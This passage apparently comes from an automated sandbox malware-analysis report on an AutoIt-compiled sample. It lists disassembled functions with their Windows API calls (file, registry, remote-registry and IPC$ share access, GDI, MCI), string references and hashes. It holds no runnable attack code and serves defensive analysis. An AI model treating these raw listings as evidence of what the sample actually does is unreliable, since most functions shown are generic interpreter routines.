                            • LoadStringW.USER32(00000000,?,003FE029,00000001), ref: 0041F90D
                            • __swprintf.LIBCMT ref: 0041F95D
                            • __swprintf.LIBCMT ref: 0041F96E
                            • _wprintf.LIBCMT ref: 0041FA17
                            • MessageBoxW.USER32 ref: 0041FA2E
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                            • API String ID: 984253442-2268648507
                            • Opcode ID: eb64dbec1aab42fb3ea47c8cbe405d0093a162cc21e7cd4c116b2d24677ed42d
                            • Instruction ID: be8601ac8a6a5cd53f2bb27607799caf7f8fde3ac85f3ad4b31b2da8e6c85409
                            • Opcode Fuzzy Hash: eb64dbec1aab42fb3ea47c8cbe405d0093a162cc21e7cd4c116b2d24677ed42d
                            • Instruction Fuzzy Hash: AE414372900119AACF06FBE0DD46EEEB778AF54350F500069F905BA092EB356F49CF65
                            Function 003C21A5 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 132COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003C25DB: GetWindowLongW.USER32(?,000000EB), ref: 003C25EC
                            • GetSysColor.USER32(0000000F,?,?,?,?), ref: 003C21D3
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ColorLongWindow
                            • String ID: `$
                            • API String ID: 259745315-74666722
                            • Opcode ID: 62d1141dfbd236be31609d6d919f2bc03a51efa75a31b59a2bba600d7f582b50
                            • Instruction ID: 37e34288e11ea8e64787f3caab93eafb30312a4b329e1d33b40fbbc227e50073
                            • Opcode Fuzzy Hash: 62d1141dfbd236be31609d6d919f2bc03a51efa75a31b59a2bba600d7f582b50
                            • Instruction Fuzzy Hash: C9419135100154EEDB229F28EC88FBA3B65EB06331F1A4679FE65CA1E2C7318C42DB15
                            Function 0044BA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0044BA56
                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00449207,?,?,00000000,?), ref: 0044BA6D
                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00449207,?,?,00000000,?), ref: 0044BA78
                            • CloseHandle.KERNEL32(00000000), ref: 0044BA85
                            • GlobalLock.KERNEL32(00000000), ref: 0044BA8E
                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0044BA9D
                            • GlobalUnlock.KERNEL32(00000000), ref: 0044BAA6
                            • CloseHandle.KERNEL32(00000000), ref: 0044BAAD
                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0044BABE
                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00452CAC,?), ref: 0044BAD7
                            • GlobalFree.KERNEL32(00000000), ref: 0044BAE7
                            • GetObjectW.GDI32(00000000,00000018,?), ref: 0044BB0B
                            • CopyImage.USER32 ref: 0044BB36
                            • DeleteObject.GDI32(00000000), ref: 0044BB5E
                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0044BB74
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                            • String ID:
                            • API String ID: 3840717409-0
                            • Opcode ID: c61f8fc24567c0af291c9c64f1b6801e79700e978ca2c2ce0ad5537c0aceba2a
                            • Instruction ID: 655d64cae60c44e1cca5e09e5f58c24c2b89228b464ff1ed539335661860c447
                            • Opcode Fuzzy Hash: c61f8fc24567c0af291c9c64f1b6801e79700e978ca2c2ce0ad5537c0aceba2a
                            • Instruction Fuzzy Hash: 95415879600208FFEB119F65DC88EABBBB8FB8A711F104069F905E7260C774AD05DB64
                            Function 0042D899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                            Download Yara Rule
                            APIs
                            • __wsplitpath.LIBCMT ref: 0042DA10
                            • _wcscat.LIBCMT ref: 0042DA28
                            • _wcscat.LIBCMT ref: 0042DA3A
                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0042DA4F
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0042DA63
                            • GetFileAttributesW.KERNEL32(?), ref: 0042DA7B
                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 0042DA95
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0042DAA7
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                            • String ID: *.*
                            • API String ID: 34673085-438819550
                            • Opcode ID: 8e8f8ed131a2002cfcdc19223921a7d93fac71686d588945949b141adef79453
                            • Instruction ID: 27555813f9def6b1d2aaedb1dc413b1bca62b190def7db6f186c18e5ca5a87e2
                            • Opcode Fuzzy Hash: 8e8f8ed131a2002cfcdc19223921a7d93fac71686d588945949b141adef79453
                            • Instruction Fuzzy Hash: 778192B1A043519FCB24EF64D844AABB7E4BF89310F54482FF889CB251E638DD85CB56
                            Function 00446F23 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00446FA5
                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00446FA8
                            • GetWindowLongW.USER32(?,000000F0), ref: 00446FCC
                            • _memset.LIBCMT ref: 00446FDD
                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00446FEF
                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00447067
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: MessageSend$LongWindow_memset
                            • String ID: `$
                            • API String ID: 830647256-74666722
                            • Opcode ID: a9be69b61dd449b37656bc069bf42a52347f9982908022b16c02224825c78d32
                            • Instruction ID: 76b6ebe1a4ceda44acdffeab12f4373cb6a871f217c7df9201d8eac5add00937
                            • Opcode Fuzzy Hash: a9be69b61dd449b37656bc069bf42a52347f9982908022b16c02224825c78d32
                            • Instruction Fuzzy Hash: 99618B75900208AFEB11DFA4CC81EEE77F8EB09710F10416AFA14AB3A1C775AD46DB94
                            Function 0043731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetDC.USER32(00000000), ref: 0043738F
                            • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0043739B
                            • CreateCompatibleDC.GDI32(?), ref: 004373A7
                            • SelectObject.GDI32(00000000,?), ref: 004373B4
                            • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00437408
                            • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00437444
                            • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00437468
                            • SelectObject.GDI32(00000006,?), ref: 00437470
                            • DeleteObject.GDI32(?), ref: 00437479
                            • DeleteDC.GDI32(00000006), ref: 00437480
                            • ReleaseDC.USER32(00000000,?), ref: 0043748B
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                            • String ID: (
                            • API String ID: 2598888154-3887548279
                            • Opcode ID: 54d6c1a7b08c73cc292accfb734968c98f3ccf383a8794a8af527ed403a7b33e
                            • Instruction ID: a58190f10d3e595cad14b8faeaf3c2d72e445e68926dea88c721b70377c91118
                            • Opcode Fuzzy Hash: 54d6c1a7b08c73cc292accfb734968c98f3ccf383a8794a8af527ed403a7b33e
                            • Instruction Fuzzy Hash: 495159B5904209EFDB24CFA8CC84EAFBBB9EF49310F14842EF99997250C775A845CB54
                            Function 003C6A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003E0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,003C6B0C,?,00008000), ref: 003E0973
                              • Part of subcall function 003C4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003C4743,?,?,003C37AE,?), ref: 003C4770
                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 003C6BAD
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 003C6CFA
                              • Part of subcall function 003C586D: _wcscpy.LIBCMT ref: 003C58A5
                              • Part of subcall function 003E363D: _iswctype.LIBCMT ref: 003E3645
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                            • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                            • API String ID: 537147316-1018226102
                            • Opcode ID: 98f358ff6a0deadbb1507161441faf885cd2ca29d2abcae0a235c5d5d0026a08
                            • Instruction ID: ecb868dc73a035857d38eb72e4eb6ecd7b8f9f1aebb56c3d8058a2e5e15cf47d
                            • Opcode Fuzzy Hash: 98f358ff6a0deadbb1507161441faf885cd2ca29d2abcae0a235c5d5d0026a08
                            • Instruction Fuzzy Hash: B3027B311083449FC716EF24C841EAFBBE5AF95314F10492EF59A9B2A1DB30ED89CB52
                            Function 00422D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                            • String ID:
                            • API String ID: 3993528054-0
                            • Opcode ID: 344f4c6cf197484d057aa3042f4e23baa99067b6bae764388d88e2ecf67a2bfc
                            • Instruction ID: 5de8f4f5893b20324c87cf62a9cae423b2aab6121027ed46a59c2eb86690f520
                            • Opcode Fuzzy Hash: 344f4c6cf197484d057aa3042f4e23baa99067b6bae764388d88e2ecf67a2bfc
                            • Instruction Fuzzy Hash: 3D71D370700225BAEB218F54ED45FAABF64FF05354F500227F625A62E1CBF95C20EB59
                            Function 004388AB Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON
                            Download Yara Rule
                            APIs
                            • VariantInit.OLEAUT32(?), ref: 004388D7
                            • CoInitialize.OLE32(00000000), ref: 00438904
                            • CoUninitialize.OLE32 ref: 0043890E
                            • GetRunningObjectTable.OLE32(00000000,?), ref: 00438A0E
                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 00438B3B
                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00452C0C), ref: 00438B6F
                            • CoGetObject.OLE32(?,00000000,00452C0C,?), ref: 00438B92
                            • SetErrorMode.KERNEL32(00000000), ref: 00438BA5
                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00438C25
                            • VariantClear.OLEAUT32(?), ref: 00438C35
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                            • String ID: ,,E
                            • API String ID: 2395222682-4052858919
                            • Opcode ID: 75255de88a2ea7e8c51b533625aee20d2372585896826a4fd18bc2559c7d7238
                            • Instruction ID: 1e37b22b2bc663f9adde337a44446a01253837a95c0a6d9628f723ae7bcca433
                            • Opcode Fuzzy Hash: 75255de88a2ea7e8c51b533625aee20d2372585896826a4fd18bc2559c7d7238
                            • Instruction Fuzzy Hash: 1EC126B1604305AFD700EF24C884A2BB7E9FF89348F00596EF9899B251DB75ED06CB56
                            Function 004177DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003C7BCC: _memmove.LIBCMT ref: 003C7C06
                            • _memset.LIBCMT ref: 0041786B
                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004178A0
                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 004178BC
                            • RegOpenKeyExW.ADVAPI32 ref: 004178D8
                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 00417902
                            • CLSIDFromString.OLE32(?,?), ref: 0041792A
                            • RegCloseKey.ADVAPI32(?), ref: 00417935
                            • RegCloseKey.ADVAPI32(?), ref: 0041793A
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                            • API String ID: 1411258926-22481851
                            • Opcode ID: 852529f12c3655d765b4c8c2da620bbc0d92daeb981661413b3c6545ccaaaf6e
                            • Instruction ID: 1409b1713c650dd7c25e94b4724bc853b3186f4c74a50a086b001989df7df73f
                            • Opcode Fuzzy Hash: 852529f12c3655d765b4c8c2da620bbc0d92daeb981661413b3c6545ccaaaf6e
                            • Instruction Fuzzy Hash: 2F410976C14229AADB22EBA4DC85EEEB778BF14310F40406AE905A7261DB355D48CF94
                            Function 00440E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                            Download Yara Rule
                            APIs
                            • CharUpperBuffW.USER32(?,?), ref: 00440E31
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: BuffCharUpper
                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                            • API String ID: 3964851224-909552448
                            • Opcode ID: 7e4f4c599a87cde7ad081465039543d97c3c80de1406db68954e21c0e0213dc5
                            • Instruction ID: 41fecdc80e6b144f98c53e6c0a15a310f611e5562902b341f1df1abb70f07846
                            • Opcode Fuzzy Hash: 7e4f4c599a87cde7ad081465039543d97c3c80de1406db68954e21c0e0213dc5
                            • Instruction Fuzzy Hash: 1741B13250425A8BDF25EF10D855AEF3360BF11300F148436FD555B292DBB8ADABCBA4
                            Function 00447152 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 103windowCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                            • String ID: 0$F$`$
                            • API String ID: 176399719-3434289740
                            • Opcode ID: bee403796c9c6c7659682d476922f192b32773e97311b7c659d30e72e5112c8e
                            • Instruction ID: c15b8deefcee8e379dcb0f8d3e69e445e6359980c579c32b0548d19f1d0be7d3
                            • Opcode Fuzzy Hash: bee403796c9c6c7659682d476922f192b32773e97311b7c659d30e72e5112c8e
                            • Instruction Fuzzy Hash: B641B878A01208EFEB20DFA4D884E9ABBF5FF09300F14056AF905A7361D775A910CF98
                            Function 0041F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,003FE2A0,00000010,?,Bad directive syntax error,0044F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0041F7C2
                            • LoadStringW.USER32(00000000,?,003FE2A0,00000010), ref: 0041F7C9
                              • Part of subcall function 003C7DE1: _memmove.LIBCMT ref: 003C7E22
                            • _wprintf.LIBCMT ref: 0041F7FC
                            • __swprintf.LIBCMT ref: 0041F81E
                            • MessageBoxW.USER32 ref: 0041F88D
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                            • API String ID: 1506413516-4153970271
                            • Opcode ID: 8a78cfff991275dc9101d3bfb9fd087156da69ed1123b404428e43f46cce6e44
                            • Instruction ID: 245d587bc9889bbe271e82fcadf460a148f78eb19f8e636ed3546404d4a7a540
                            • Opcode Fuzzy Hash: 8a78cfff991275dc9101d3bfb9fd087156da69ed1123b404428e43f46cce6e44
                            • Instruction Fuzzy Hash: 2821953194021EEBCF12EF90CC49FEE7734BF14300F04446AF5056A1A2DB359958DB55
                            Function 004252C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003C7BCC: _memmove.LIBCMT ref: 003C7C06
                              • Part of subcall function 003C7924: _memmove.LIBCMT ref: 003C79AD
                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00425330
                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00425346
                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00425357
                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00425369
                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0042537A
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: SendString$_memmove
                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                            • API String ID: 2279737902-1007645807
                            • Opcode ID: 893b0fc03801322168d51e438c56657c630a6a08396268f205f9e676d75d663b
                            • Instruction ID: 5d785e8045f13e508b56c2784f2062d2cc4edfb76cee1b7a81260d4c7b4dd231
                            • Opcode Fuzzy Hash: 893b0fc03801322168d51e438c56657c630a6a08396268f205f9e676d75d663b
                            • Instruction Fuzzy Hash: 4311DD31A9012979D724F661DC4AEFFBABCEB91B40F50046EB806E60D1EEB41C04CAA4
                            Function 004246B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                            • String ID: 0.0.0.0
                            • API String ID: 208665112-3771769585
                            • Opcode ID: 0f429ab8f552ce6c32d29be9e651371823de75394fce7d9e1093973b6a4f801a
                            • Instruction ID: d5607ec094370b87640e78076780e95f296b140df724ef3f7c1bdf81ebb3473e
                            • Opcode Fuzzy Hash: 0f429ab8f552ce6c32d29be9e651371823de75394fce7d9e1093973b6a4f801a
                            • Instruction Fuzzy Hash: 89113A35600124AFDB15BB70AC4AEEB77BCEF82311F4002BBF5559A191FF788E858658
                            Function 003C3015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73windowregistryCOMMON
                            Download Yara Rule
                            APIs
